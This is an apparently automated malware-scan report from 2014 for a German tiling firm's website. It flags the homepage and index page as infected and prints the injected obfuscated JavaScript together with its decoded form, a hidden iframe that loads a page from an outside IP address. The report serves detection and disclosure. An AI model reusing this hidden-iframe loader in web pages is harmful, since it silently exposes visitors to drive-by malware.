Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=marx-oha.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://marx-oha.com/ | 200 OK Content-Length: 6986 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v475aacdb5d314(v475aacdb5d93a){ function v475aacdb5dd17 () {var v475aacdb5e101=16; return v475aacdb5e101;} return(parseInt(v475aacdb5d93a,v475aacdb5dd17()));}function v475aacdb60c12(v475aacdb63ac1){ function v475aacdb6469d () {var v475aacdb64a74=2; return v475aacdb64a74;} var v475aacdb63ec6='';for(v475aacdb642a7=0; v475aacdb642a7<v475aacdb63ac1.length; v475aacdb642a7+=v475aacdb6469d()){ v475aacdb63ec6+=(String.fromCharCode(v475aacdb5d314(v475aacdb63ac1.substr(v475aacdb642a7, v475aacd Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=c1c54c6be10a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*106522)+'d4e215\' width=482 height=221 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://marx-oha.com/index.htm | 200 OK Content-Length: 6986 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v475aacdb5d314(v475aacdb5d93a){ function v475aacdb5dd17 () {var v475aacdb5e101=16; return v475aacdb5e101;} return(parseInt(v475aacdb5d93a,v475aacdb5dd17()));}function v475aacdb60c12(v475aacdb63ac1){ function v475aacdb6469d () {var v475aacdb64a74=2; return v475aacdb64a74;} var v475aacdb63ec6='';for(v475aacdb642a7=0; v475aacdb642a7<v475aacdb63ac1.length; v475aacdb642a7+=v475aacdb6469d()){ v475aacdb63ec6+=(String.fromCharCode(v475aacdb5d314(v475aacdb63ac1.substr(v475aacdb642a7, v475aacd Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=c1c54c6be10a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*106522)+'d4e215\' width=482 height=221 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://marx-oha.com/referenzen.htm | 200 OK Content-Length: 5523 Content-Type: text/html | clean |
http://marx-oha.com/fliesen.htm | 200 OK Content-Length: 5486 Content-Type: text/html | clean |
http://marx-oha.com/sanierung.htm | 200 OK Content-Length: 5493 Content-Type: text/html | clean |
http://marx-oha.com/treppenbelaege.htm | 200 OK Content-Length: 5489 Content-Type: text/html | clean |
http://marx-oha.com/kontakt.htm | 200 OK Content-Length: 5482 Content-Type: text/html | clean |
http://marx-oha.com/test404page.js | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://marx-oha.com/fliesen_2.htm | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://marx-oha.com/referenzen_2.html | 200 OK Content-Length: 4800 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: marx-oha.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jul 2014 18:41:10 GMT
Accept-Ranges: bytes
ETag: "786993-1b4a-4f0e1d7763a00"
Server: Apache/2
Content-Length: 6986
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 16:11:20 GMT
...6986 bytes of data.
GET / HTTP/1.1
Host: marx-oha.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jul 2014 18:41:10 GMT
Accept-Ranges: bytes
ETag: "786993-1b4a-4f0e1d7763a00"
Server: Apache/2
Content-Length: 6986
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 16:11:20 GMT
...6986 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: marx-oha.com
Referer: http://www.google.com/search?q=marx-oha.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: marx-oha.com
Referer: http://www.google.com/search?q=marx-oha.com
Result:
The result is similar to the first query. There are no suspicious redirects found.